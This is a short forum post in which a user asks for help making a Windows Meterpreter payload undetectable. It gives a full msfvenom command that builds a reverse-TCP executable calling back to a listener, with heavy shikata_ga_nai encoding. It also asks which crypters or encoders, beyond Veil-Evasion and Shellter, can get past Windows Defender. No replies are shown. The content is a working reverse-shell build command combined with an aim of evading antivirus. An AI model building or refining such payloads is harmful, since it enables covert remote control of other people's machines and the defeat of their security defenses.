hi i need some help with creating a undetecable paylaod
the script i am using is
msfvenom -p windows/meterpreter/reversetcp LHOST=10.0.0.2 LPORT=4444 -f exe -e x86/shikataga_nai -i 200 > xxx.exe
after i create the payload i move it to a windows 10 64bit and its immediately pick it up .
i was wondering maybe it cuz of the x86 encoder ? even when i use veil-evasion the windows defender get it.
are there better encoder / crypter known in kali then i am missing ?
the only way i get pass my windows defender is by usnig shellter but then i dont get a meterpreter shell back ...
Comments
No Comments Exist
Be the first, drop a comment!